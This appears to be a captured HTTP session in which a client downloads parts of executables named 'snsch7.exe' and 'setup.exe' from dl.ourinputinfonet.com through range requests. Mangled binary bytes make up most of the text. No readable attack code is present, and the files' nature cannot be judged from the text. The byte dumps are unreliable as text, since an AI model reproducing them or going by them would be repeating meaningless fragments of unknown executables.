X-HW: 1434694598.dop018.am4.t,1434694601.cds055.am4.c

Content-Disposition: attachment; filename="setup.exe"
).D..p.&K.`h.....}.<,..=...:..Z9.N...K^.E.!.4.."..A..3.M....&e.x.IS
Z..v. &....T..`..Q.f..B..N.[....e3.V/.{..pXX..........m..U..}.KE.!..0u
.@.`3.5.......-...vs.C..B..bW..j..8..D....I..8F...f7....~;S.>...J.]
..\..OwN....j..PI......ee.f..D....'...w......%..[.{..........x.-t1....
,._....Ob...>V.v..M@.(U..I&....W. ...:.'....%.d....^.*..-..<H.(|
PiK......=.*.....Z....w|...[[email protected].
....M..E..-.6.]E..(h.........}.-.,-g....c}g.....{...>...fv.........
#.L5...uY..........)qL1....n..pUH.....o^.x....#..w...g.1....&.cI.|:J.}
.j)c.......(....C.lZ...m.%J.....g..f=.C....Q.|($..=.W.dc....W..C:..e'6
q..v....UD..t..$n\.........&yq.M...~...<..[.>z......._.."x...csM
......[.... .W.=...=..(^.NN....e..uW.( .e....(.,..2T..:[email protected]_li.....t
E......F.B.<.:s........./.....`..>{.@..#.............>..z...g
@.....Q.....k...B........t...l..%......v.......dM..$.h...P5....%.E_v.l
;.m....{_.....r7.]Am*..C.I.3.{..~w.s,...g...B......".N..a.e.g...!...EH
_.........e. .bo...s.8d..*C$.Z.....YS.6F.CDT..)O...o..m.......Pc.h...z
hz.......[.....z>.... ..Le.F-.Eo.....7.T.7R.-..nWl_#[9..........W.&
...j.3.T............D...w..myv.R.4.n..'...D..?..<_....(Kx...f.....O
w.L~......op.iP*..4..o.....H4.AlVy..q....%..0.,....;...y.,.5.. &..D..|
.&.l0.yZ.<....6>..?W.......N=y%.e..R.k....Vy........Z)..2-;..../
E:......D}....~..j..)OhfQQE......[...?...{s.)......a.E`......(...kw...
._......{9..!$..A$!...O....|[email protected]...{..8Dfu...9...X^t.J?.#,
..k".1...$.......n...*.`4.Y]=.Q`...g....%.....x......1.L7#.IU.c..Y<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=4500000-4749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:41 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434637776"

Last-Modified: Thu, 18 Jun 2015 14:29:36 GMT

Cache-Control: max-age=799

Content-Length: 250000

Content-Range: bytes 4500000-4749999/10182738

Content-Type: application/x-msdownload

X-HW: 1434694602.dop018.am4.t,1434694601.cds037.am4.c

Content-Disposition: attachment; filename="snsch7.exe"
....z.........z...U.K.Y..y.G..P..a;... f.'.B..U...............l.E.Tk.L
.JB.!wpY0`*[email protected]}...N(.R..........$.G.......ii.Q
EH.o.../P....o.D.....t..v....vJ......,_2,..-..T..K.....T...j...4[=..7.
x.?.s9.)..D....-..ec.6..).*.....A.......f.q..e.....L..|.  ).]a..'m.._.
[email protected].:<....S...zW........#...98Z..X..........0H..GF.......r..?
7...W...Sq.gbE....{......tU`8...PV.....$..2^2y`.8.s.X).KRp..z0........
.....H.=.|.2_.$..u....!..^.mW.#...........}.h.....'.....D....AzP.i ...
.m...d...d.6*xMUL7....7.^..?..k.@..~.4c.K..h>'..@..!.....s.eG1.?{.G
.......''...8..p.2..9.K.:M..[.\;....`h...a9.K.\...-..W. ..B6.mE.h...sL
.....N...X..w....38...L.h38.:Z.f..?....#.j.....Kd..O..#.^/.h.^...].e..
e.F} .s.r...HX.....[v.5.......E..kO/.>?H..S`..N.....P..FD.........,
..M.L8.F-.P"b..........~.......1.....G..)..Mw8M;QL8.....}..P...s...M.Q
.......S.&.(.]B...s.$...q3)-..QY].*n..]Q*..y.....j.zp{....K.x-..T|....
......F....j...r.`Q.5.N.Rk..5...M.[(..#..U..i... .....~Z.g.&.n.k.RIR-?
[email protected](.3.]3t...5".`."6..._.`A..[...to.:z.l....z\..}..wk....
.p....qn..(g......7#.&y..D.....hix..D.....~........=.&A.%......H.R..K.
...]&.....-....{..#,[email protected].|2....a.r.....4.o..Y@...........<.
^.%...w.{...l...Y..tcw..h.G"T....j..i.H.&.K..........Z...x..... .1.8..
..u...i.=..........{f4.I.7 .....:...q!1ON....]..|.3....<9.o=..fI..U
\..).g.DFF..2.:.u..R.?...hS.a`.....wP~......Px.[O}...p.2..c..T.N.$.{K3
!j&...\s.(...[k.!..I%o.Sw.i.U.g....\./Q.".0.....V..Ye;.*1.~.8k..4G..'.
..j4.....v.di\...c.F.IX.....4. $*.W.(Ma...9(..96..,gb6Z[{......~].<<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=4750000-4999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:41 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434634143"

Last-Modified: Thu, 18 Jun 2015 13:29:03 GMT

Cache-Control: max-age=766

Content-Length: 250000

Content-Range: bytes 4750000-4999999/10834868

Content-Type: application/x-msdownload

X-HW: 1434694602.dop018.am4.t,1434694601.cds037.am4.c

Content-Disposition: attachment; filename="setup.exe"
..8Y4.5.....v.x...m...........9[...*.......BA.D..bR.FF:.....Y...pA.c..
....4.=....vq..1...1..<:;x..W..}.l. z.=.9..F..yuj....D....%/.~.\_.y
[email protected].*P1.m/i;1.v.;&8
q..... r.....6S....Vs.. H7..gs.v.q.!I.S...]wo:. ...:.$................
.e[_.(...95.w.5.....Bf....$c..K...6.*.../...!..O....6,.........=.....t
.^|.....MMN..8..8?....0....E..........o{&...*|.B...:]...x1...D(.......
 .s....!...$..i..y.E"..[..&....z.W.3..d..R.n....Mj>)......*N.\...;.
Q.8..~f...T..'..4......#U.8.p8...j.g.U..5....3F"..........~...G=...h.p
[email protected]."..~v..b/..FL(p,......V.,y...Iab...q.d..X..".....2.....
F!..VX.M...q......4. `......f.pB....W.#d.....veV.d>........o.......
.e..E.....?......3...U..0......{m...N.[.......w....Tj.... j.w.\YY.....
....[gJ.{..*.0...".../..p..*....K&......;{...t..%.............2H......
...'C.3.c!.v.%......u.....|.....ZX.............;E..C..#..(.bWs=...G.J.
..F<n..dP...G.*.....)...f}.)h.....`...u....B.8:eN^3=[.#.B...i.lhd~.
?8XWg..6..i.ww^....F...&pY.^`".%..!'.B>.O.8.."..z..*.5O.T.a.m....f.
..T...h.L&2T.........'../; .h.2..Q.;.3...21..^..?.I...#`.....%....Q^..
5.k.}..<.$S........%.q.z...w\....)5Z..s..;.{I!Z.(l.aHQ.,....5K.k...
b.......i..K.^9..N8HD......Q.L.....l...Y..Y^.b.X....H..=.H*.~..!#[..g.
A.e|..0.....>.p..TR.....c"$.1d...Z.bD..IE...).y......tp.#o....t..d.
;.....N\.u.456..S..'... .X=..#...*../o...x*.rG..].b......md..6;A{&..R.
..N^.D....AA#....B.};|2.......C...1/.u......7:.?....1._B..f._,_......X
.zr.m...V.(]X....|."[email protected].._t...c.g(..>....:p..{....;<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=5000000-5249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:41 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434637776"

Last-Modified: Thu, 18 Jun 2015 14:29:36 GMT

Cache-Control: max-age=799

Content-Length: 250000

Content-Range: bytes 5000000-5249999/10182738

Content-Type: application/x-msdownload

X-HW: 1434694602.dop018.am4.t,1434694601.cds037.am4.c

Content-Disposition: attachment; filename="snsch7.exe"
ls8bEO.....M<..../_..p.e....4[......E....s.....I*qs..V2|wu.J.. Pt8 
.$...Le..|..B.a63x.|j."...[...Kr..C.....4V Y.....$.;...q....E.....@...
..LpD...w=K.5.<..g.....>..9./.(..."[email protected]......*5..
TV...h...t.?.pw.i.\.l.......&.<....l..6....%......4..tc:K.U]]z....#
...gE/e}....}O.n<.nw.&.`j...v..[....Ue..j..............{...O..W...7
...|...q!No4......;...3......;../........iY..rsc...k.........ww.0*..("
p.1.}.......".-.;.v.k..2......4..j......3....9A.W..E......tr.F)MxM.G9.
@.n...U.^{r...4.....F.....o.....M."n.j....G..Dbk..f%.. =...-.{;.5.....
.o.}....v..L......^...a..#~.a....Z.-..A....._t.n.....iP_.#.b.Y.Yl.'..;
.3B.z).....v.x..Qk....S....l.6.O..."...>....z=..A...S.Z.........P&.
....W1L.......U9. ....T..,5A.?^......T.=.U{e......p..}..........G.x...
j^0.- ......~.w...........e|..5.V&.....Rr.(.c....*gi..#z.). 1M.&o.....
.}..t..;........-.S..9........ 7....y...d2G...'.....c.6.#v.....'O..'q.
.E.4..=.4.........J..r._9lun.}...*.$...=.G.........t.P.J.W............
.Xz.3O...I..2....]w_H.....f....2...>.o.....E.iM...LXW.(...I~...|_./
A{w.h.!-...BO....0.7......^.........8v_...........d...:~..w.$_..3.b0M$
E]..bZ`.........F..Hma.b...L2UE./..&,.[.rv|V..P....C.....t...;,R...K.~
#.$|A......T1.]..R......a.._..7....Y. ...m...........%..:^..^..Q...'Va
c.W......X...P...?...Os.Z....#()..${. S...a..3.i..........~.......T...
.-..\.g.&aZ.....Q.H{=...Mg...(...r..>D.4cY.$..........B.8.%;.....0.
.....f|-%r#.F.1...6V..y.(.O......*RZ.B .u.....;.....L.*.....M.........
.7}.^.5nZU2.B.$.J...};/?.......q...9{%"b.......3..)..Yu....l...I..<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=5250000-5499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:42 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434637776"

Last-Modified: Thu, 18 Jun 2015 14:29:36 GMT

Cache-Control: max-age=798

Content-Length: 250000

Content-Range: bytes 5250000-5499999/10182738

Content-Type: application/x-msdownload

X-HW: 1434694602.dop018.am4.t,1434694602.cds037.am4.c

Content-Disposition: attachment; filename="snsch7.exe"
.2i..LnH.;....vTW.. ...u/.`w..H.o.v.yi$....}......rC>.. . R<F..!
2g..eb...(&.p....4L..5k.....P....J......j.....P.....W.....x..0....E...
.o=....t........|..Odg..hn.........Y.4....6.. H.....D......M.C...4....
....>=K......5..|>\..2b..;..:..........#..[.....t..z)..<./y4.
..v.O....T.j.w.........k.!..P..R....9`..r......~.....|..K....E.P....U.
.. _...OTG..dv.....G.<m......FN^\.E.vDe..E...)lg!./r..T0..v.N[.P^..
....na.../5...!QJ..({..Cs.x....a....b.r........F[Lq....s.l..S..i8.....
...uG..Zz.%..v..6...M.)...9...F<..q&..A..2..._"..L...bA.O.h.}Vp...)
<.c*O....\...%b...|.-.G....Hz.H...WS..c....T..#i..0....._p/....U...
.K...P...neF=..v.$...$...m[.)k.U.Id..t...D.........f.hP..|U.J...g..{.;
.....@"..S....W#.......\J.7pN.`...../.ZD^.C...%zC..D..fu%9..tLT.....-$
..... ..TM........\.(!#...D..x.2.g............k..q..Z?<..c..A...j..
=CM{...`..w.i...t.TY. gmS9K.y15.Y...*d..)%.|Mx.jV.o.P..WE...z.......3c
...iG.8.3..[..^..jr...4..b....Fd....".hmx.@`.DR..=.q..^\.2..*Gm....C".
. .|{..t..-.>{F.aJ..7,.e8X....S"p.\4*.x...*..p..~#...S....5..U...{d
W.9S..fC:.Ext.(M.pp.vWEa.gT]~..(&t........p..L..1A...k(2H...Yf.....Kh.
.C..t.....wX...2.Pb.C..y.~X..Q...j..z.(Z...z.....E.0w#B.7o.?....e....j
.Xc.{%.r.1...X.x...!....O)............)....R....n."....:c.d..g.5.....r
...W...x......Y.<.up.j\<.{o7\....=.!R.........NC9..X9&....5.a...
.mi....*...\.....P{/...k.z.:...N(...p{..m.........Z..h.Z..k7.gK.].//..
..j..d3...V...()..<f....o.t...L.1.9......J=...d....\El!.....&......
..v..j..^\...s W....:...t...{...u..J/..N.L]..J.4$..`.g:...*8/.pJ.g<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=5500000-5749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:42 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434637776"

Last-Modified: Thu, 18 Jun 2015 14:29:36 GMT

Cache-Control: max-age=798

Content-Length: 250000

Content-Range: bytes 5500000-5749999/10182738

Content-Type: application/x-msdownload

X-HW: 1434694602.dop018.am4.t,1434694602.cds037.am4.c

Content-Disposition: attachment; filename="snsch7.exe"
u:..[....n.x....t.......O:}b.&..cm.b..=s...mF#7hA.J.........(.Z..pga.y
.<,.t.w.:t....H........]G....v..u~I....=k_#R...H.F.;....p../...:$.Z
..a...J..$[gr....3................$.../=X.vH..`..R....R.=....._.m!.D..
.Y.8r..h/.A.R...6%..t\..{<.#..f.....W.....Q...B.>..Y5...u".\...H
..ZAv.Lt.>.*.O...i.....QK.........y.....! ........k....F......0.g.H
...t.&..S.s.......n.....*..I.,........>.:..6A.....q8...n#A..x.....w
.C^.L`...K{............?...<..E;..Z..{. H......~..B......6..zAO..u.
9\..c.:.g..Zl`X....\C......o,x*g"*.^/H.3.. 0...p._.../....%[email protected]..
H...............y.d..$..v@.(R....] .c..V...FrT.dUd..S....)bv%.*...5.!\
....[-\...kq.]~.\kPlg..Ei..s..T..H.........3..-(.R..:..Au...O.........
.&mO.j....Wl...| ..Q.en\(..O.Cf......B....N.}mo.:.e.K......R\.4.o.....
j.........,.C..........]...7k...2....Y%"z.cI.....A.......6.08.WLqY.b..
.......%....1.k.c....PH..[.J>.C.."d...i....b..c`.F..k.R.*l...../.'.
.>..-Ea.T%.....y.c.....<6...Ma ^X.f K..d.......g......z.;;.^U...
.k..>.'..A......wN.g....:f.....R.a.......Zk~g.....Q.x...h.e.8F.#..&
lt;...L..0.f.....7>~\@...[..F.n#/O..^|tA.M.S........[....y....d.K.=
..A....n6@f'......c..m..t.........*!c.W.......N..}..td..l.|.!;...j2}~s
...F.'.=.5.....l.;....v..!T.$..e...;..'P...T...t........*. R......v.C"
q.!.....-M...........4QF|.-;C(.T.O V..x/.sG.N..%4.g....uD'.|...Q.D.../
....h}.....^....^..L.!....4}... ..z.........'.g.....C...B%....8..P..n=
..,.bZ...MU..4..l...j.b....W..8....8..,P..O....V.n..1?".e...F.~js....8
g.....s^)}.0Ms.lY..}.1...;........wQ.]A.......zw?z..s...c......BJt<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=5750000-5999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:42 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434637776"

Last-Modified: Thu, 18 Jun 2015 14:29:36 GMT

Cache-Control: max-age=798

Content-Length: 250000

Content-Range: bytes 5750000-5999999/10182738

Content-Type: application/x-msdownload

X-HW: 1434694602.dop018.am4.t,1434694602.cds037.am4.c

Content-Disposition: attachment; filename="snsch7.exe"
.bv....K......9.j..QT.A.O...5.............W..r..<..t.N.X..(.&...p.?
.5...Z-..`...cV..`7.H....u..L...^i..i...(n..dsu,_8h.......,.t4.7....[t
..Z...z\.(....?.....X...F\...0`"...%l..........-..nX..F&........B.....
A.V.7.r...4...W#...*y......J.`.Jl1u..]...|S.&?.....9.g...m=mK.IOD.\pv(
.]....n..l.}s,k...P.W.A...33.f.`x..)^.L.A(...d=<....$f..8...pK...t.
A........_=...{.8.f%@L..kwI(...].8...8..*.......Yp..[.EY...J.<U%.q.
..I_......[.t`..Ons../.%.f...{...Z..'.....G.n.L..G.&.pJ...E.8E..P.$&l.
{.I/......I....md.Z..(.HH....|c7...F...O..%.d.....]C2.........B...,...
..u.93S..%JV/.....,.C.G?.>l|.80.L..mk...{\rT...<`.Ac. <}...V.
Es..ub.P..R......../..|.&. .#.M..M....=.Qc.@.;......X.(........3....E.
..N..V.}[email protected]....}UO.l.............5..P.P.........0.z....
..^Eo-w.Hz..G....j...R.w.!l.....zR.:...../.. ..D..U.t....h.!.2.-.}.~..
 ..T......./.{(3...p..f..;......1..B<..!..=............&c..x.y~L...
{8....0".L.K...b..h..!..p....., ...e.....0.i#..'....1..2%0.....Z.,..jm
f5Bn.;.......p7...(. 1.K..u0l.V.^0.0bK...K~......R.........;......B...
`....O..N.ND..:.J....]R...W.r...vW&b.6,.<.6...Fbi......`VY.].t.....
 r...(.;y.~2RB.K$......Uy.Y...zrJ....[..:...}V.a.....Pt.f /)...c=..UY.
,.w..I.DQ..z. ..Ek. )$.&..m..X.7...B^Np(\ .uQ.J.1...4.B6F[.gs.>.O.Z
*}3.....md.._..9..@ ..$/. .6..|.b.U.....r...M.F.{J.LA.....K.H.e&.g..`.
lT'.a].G..L..2....&...H.%co-}.o.2l.O9.q.>}:.....^./.o......?....m(t
.^..l3X......S.B.4{J_.).3..G.J....G....9_8N...p.!.%Il....E...>....#
.e.-..VT*K.t.$F=.(...0l..B...l......,C...n..B.S.....Z.......Z.z...<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=6000000-6249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:42 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434637776"

Last-Modified: Thu, 18 Jun 2015 14:29:36 GMT

Cache-Control: max-age=798

Content-Length: 250000

Content-Range: bytes 6000000-6249999/10182738

Content-Type: application/x-msdownload

X-HW: 1434694602.dop018.am4.t,1434694602.cds037.am4.c

Content-Disposition: attachment; filename="snsch7.exe"
...`.Z2.k...|..0.K...j....,..k.o..j.......lzm...s....j..Z...P..0.....Y
...*..8U.....&./1D.}[email protected]~.7...T..'. .......)[email protected]
!......$...`Yc.....e...fH...$..7Py1...HF....X.R....>R .........1.(.
.....I.b).......g......2r......i.(.y.:. .v^n2...P..Vy[..l.FO.y.H....g.
B......t....O..d. Bz..6...0<[email protected]....\..4....}.F.d.i
zi*Y..;..id...GX.eX...L.]..E.........2y..~.4....*v.e>.:.C....6.U...
..n.9.To...|.hM....e...`....n{......{.....H.....>.D.../.P...|.YY../
.8|"..P.}..L.[....q...J.....K ^w>.Db{...9.....B.a.1...2...\..8...8.
.^Jg........a...jwa....K..e#'.|T2.........0....wI.`Y.P.!n.....g..,.0..
W..q....}.....m.F5...f.Dc..Y....?..BL......*.. ..1.f..T...C...A...0.#$
1...]?1.<..U....9.P....)..N...........pV.px.1"........S5...~.... ..
..}."E'......>-..LG6..4.....0|.... ..T.=.*.....-..5..;u.4QQ.*`..^7.
[email protected].. ......}.-...G4..-..GD..4z....S...#.....W...!
..?.&....iN..uK.&.b%[email protected]..[[..r.DU.1N.;..r1...-7.5.......m..
Acm.....2GuB.&?y.. .g.AI........K...l.0..!U7j...,....xIj.{..........l.
..y.m.AY>.)4.j.".'G....w.sfs&(...*...Q..)N.....y$.lpY ....`....V.".
.S.J..g.......;a.....6.o{.`.~..x.qqSo.....k|}Q...b..-.....J2.....|.a..
.DEk.#f0...u7.{.........-.A.._..i6..........f.|7..._y...;:.'..s}...n;.
..r..w..\....1.R.aV.........Q.F...=....Q... qZ-.27&../......5B$...>
.i.....ft..fW.....cXPnk2.FnO...'.C"..]3j.../%Xk...Y_.....Ar*l...2 ...v
.....<.v.).&...K.._. We'.....s....u$.H."....*. s..Ym.....e.t..P....
.6H.d...-.Z...|.o...H.|..c..lL...c.3k*.b...=Mf.|(p..r..VLYGemB...c<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=6250000-6499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:42 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434637776"

Last-Modified: Thu, 18 Jun 2015 14:29:36 GMT

Cache-Control: max-age=798

Content-Length: 250000

Content-Range: bytes 6250000-6499999/10182738

Content-Type: application/x-msdownload

X-HW: 1434694602.dop018.am4.t,1434694602.cds037.am4.c

Content-Disposition: attachment; filename="snsch7.exe"
...O.t#..1.}_..0.er..g....f.rs..9........J..G[Av.7.B....&9......#..M..
.h...s..g..z.2Qz.9T..r.."1`$.u.J..7....]x.j.......!.. ...4.j....\...D@
.<.r%..n...&.Z.....>!V.....-......|....ON.=^...Zt.7lJ-Y.E.... . 
.......LT...d{.......[m....../.....)...X.)u...S.....B..G7....F.../...N
YI;..5R....2[hH...........~.].}T.?..[....iETo........w..V..q.U..Yb...E
=U.K6................g...g.*..#g.q'm_[.V..NK.%'8....\..=SZ4oJ...I..~-s
..JzV.LqK5.l....X.C5...../. .:...~%O.b6O...a..-.W{..(..~cnMz..3,)....0
xr..X........{... r...2..I...........q.......o.$.?2.L..l.*.L.&. ......
Y<...C..6:S".....;cM.K...Q.b./.G.elL..7.......gik2E.......8...z.`.C
}o.78pF:c..WI&......G`? ]..c..Cl&......9.p..Ud*. ..h..My......YU......
!.Z.X.8M}...D...j..l...&VD.D.kc.........fV.E.^.F.3..li...*5..a....A..0
.....X... ..M... ]....|. OGs.(.*i.....)a....e..An....E.`W...K7...Y....
.`.W...9.:"..M"r..X..-.[ub....mi..s.X.-..EG.{.......p.&.W.5.z0..P?L"`.
jfb.</.......Y.4....Tm.=...c]O:Tr.<#.Sj'[email protected]%.$...
.Z..m./......b.JI.v.^...p... .....Nj....M}.*.....b.g....r./zA....p.:..
x......Z...].2..yg$....M.zv.........Xl..H....[.g\g.....Ib......%.....X
l.|..s'..d{I...TY.9..v....0(\M.4.[.c...i9..............F.p.. ..h)VIg C
.NG.x].......-....T&.. ...|yZ.......y..z.....c....$.E3_.......B ,...a.
A[N..? .6;.I.K.w.........8g,o. O.i.A....0....y.....#...C6.h#.....?."`.
....X.q}Zm.mF...4..P......r..6]*.#....a.......<}....5.^M..U....]...
.;.Ch...)...#o....;[..<.......h3.W\8.n.....`A.yh`.........Y..J.....
}..d.rO'L..|..jR..|P.C.5p..T....n.R...E.?....F...n...FsV%..NW..".r<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=6500000-6749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:42 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434637776"

Last-Modified: Thu, 18 Jun 2015 14:29:36 GMT

Cache-Control: max-age=798

Content-Length: 250000

Content-Range: bytes 6500000-6749999/10182738

Content-Type: application/x-msdownload

X-HW: 1434694602.dop018.am4.t,1434694602.cds037.am4.c

Content-Disposition: attachment; filename="snsch7.exe"
@e........Sn.....J......7'.cA..[f5.P..H..........Qw.Iyp........ Y..@..
$..?..hj....&.?.....2.j...'..ImQ..-..o..t..%.t.2.1.g.Mg..... ]W.*7...M
..'@..F..#,.....g.x{....=6.#...h.>.>...`....>Q....l.=....k.Z.
.t.}.^...:O2F.N....9.......*.\.e..<3....s..I..0.a......[.X.f.....O8
.m.R.y../..Xb.<.5.s...b9.........e..d/..I.(.5o..D.&..U.P...,.... .C
 ...A..TH&.k....y..............N..e..9..l....{{{=......h..MI...=.0....
.....&.C-...s.fF.O|m..<S.|...;#BE#..d^.r.....hk..u.k....Y..Zv.nh..B
...2./M..:..;.%.f..ow..=k/...[.o..>...f..%.x..|)..y....L...~_E....%
1..b.........f..,.t`^9......W_:..~.s..u}S...t...9...i.N.T..#.s.<...
...#~.^U.......bg.,9m.n.v.d.(......8...g.>....R......kC...YAm..%.R.
.U..Y........3...*o.....se.N.dN..r}Il...n>]..8^...5.W..[......];.".
.4..Y.k.`3..Vu...........M..r/..JTE.....~J..B.5.s..N.J.....Y)...b.q...
{.j,.fZ|..,5.{.....u.....;.....kU..SC....*Tg\..\....I-.n......'..`i..u
f..^A_....$n.Z.O;.Z..kT....V.sLk.p...F...N..4.E...6...f.m...a9.^Y.v..t
..q...G{4U...0...3.*..i.....-.1...!p....`...].6......q...0....FK.T}7o.
.....U>...R....G..1....O /.Y..,........uH.. ..vF...me..w7.Bbo.i....
.?H@h.....\...b...(..R%..f.b....IYy.W&....fz...p..;.B.sJu..$.1......x.
......0X8....e.s...................R..n?..'.87K'Y...Ad.M.Q.!.*`bq!.I.R
..U..<.N2^...6.KP..H..R._}P<...........q..*...T..g..0N..C`'.>
..:.{...]...M...n."...yf...E....x.oL....).:.YXo.T...S..q.&.VK.u.h.SF..
g......~..,.......:.....U....s...hv..i1.....&wB@(.N...3.....y.c.2{.tTr
.j....=[...5..D].:h.9TEe.]......ZX......".}..*_}..vB....;..6.e.0.a<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=6750000-6999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:43 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434637776"

Last-Modified: Thu, 18 Jun 2015 14:29:36 GMT

Cache-Control: max-age=797

Content-Length: 250000

Content-Range: bytes 6750000-6999999/10182738

Content-Type: application/x-msdownload

X-HW: 1434694602.dop018.am4.t,1434694603.cds037.am4.c

Content-Disposition: attachment; filename="snsch7.exe"
<[email protected].\......UX#q. b.J.....]>J.rv.._..K....t..-.U^3...5.h..
.o......}K#.?.sx\.&.g..-iMI.}....a..}....h..l......j.|;@.......#n....H
...>;...y...u.JI..4../.Ns...g....Ts....r...$..............tY6..=...
,..B9."...w....6..F..$&...Lt..L...1S,].L..`..P8.._...}p*..~V..........
.%...~....x..Kt....V6e...'.....r=[.c*]I.9.N..?.>...0.q....n..$.J..4
..........!].. .P..QD...P.Tb..d.....A)yp..J?...r.x.`/..R..rb[6.v....a.
5;.....r....F._.=....a{.|.....X[.<[email protected].;.`M..zc....=.....
.......b.>........@H.....`P\%<S.....k..#....P".....*{....m.....F
..v.H3A.Ny... [email protected]......&Z%|
:...,[email protected]`.U ..K...Ye..f}].xc..B..^x.v.H..S.....A]#.`.x.>...1
...L'.d@4e*s./=..2<..F..(zX......&.S......M6.v."....'J.w..]<Z^".
...)!m.[.6...!..q..J1G......et>.!.....H|.!~ZW...g/...Ap}@.a.q..N.p.
...h.........q^W..M..Gwy...w.cqp.p2....{.uB.*O..pP..5.l{/.#..M.....~:.
.:.h.................5.!8....p.@.\S....#...'...2r.,...g.dg.U..).S.9.a.
.{Y..Z.......[*..v.V.>@....]......w..."s....D.......`F...Wj..Br.h..
......e.Y..bWP........].......!.0.^....<..f.:..Nk.C4_...WHU/...y...
C..4R....N..7.. .UyZKs....p.S.r...._.06....h.a..U.....).T.k..... .8>
;.ie......:-.....*.....=_..*{..JR...N.....C...!}8(N....K7.....W...C~..
./....T6.b ..=S`y{x....?.v/....B..p............Q2..{x<`"...&)...I..
.....@!Mu5.&o..MT..........4........ ...r....D.............!^....k....
..*.......... ...t{..y.6...c@.$....#...X.Q...QEz....y..!!.m.y...E..h..
...q..G..6.i.&,.l....Zo.......D...".....@l.>....o...,.I&v. 1...<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=7000000-7249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:43 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434637776"

Last-Modified: Thu, 18 Jun 2015 14:29:36 GMT

Cache-Control: max-age=797

Content-Length: 250000

Content-Range: bytes 7000000-7249999/10182738

Content-Type: application/x-msdownload

X-HW: 1434694602.dop018.am4.t,1434694603.cds037.am4.c

Content-Disposition: attachment; filename="snsch7.exe"
..8....a...A..N....E..;...V..\.].............s....x.......h.#;7O1....'
.z.......Y..S.....z....Q.l?*N..}rF..e..w.b.ul,[email protected]....=.a...
=nr...6>...0Pqx..f................9.2.`[email protected].....
..}.|..n.................pG.O..._C.c..E....4....r.F.qO.....j......O...
9H.j2V(.YMM'.Cd.'...7....F..TL2....I..8k#..,...B..'.'d}l)..e.r....c.w.
Hn..M....BX.........V..........qG.y.&0(..o..u.[[email protected].;...A....kEL.-
n.Sr...= ..,..6Z$K..ZX8....)oz..2....W?..*......u.J..U.....M./$#r.D...
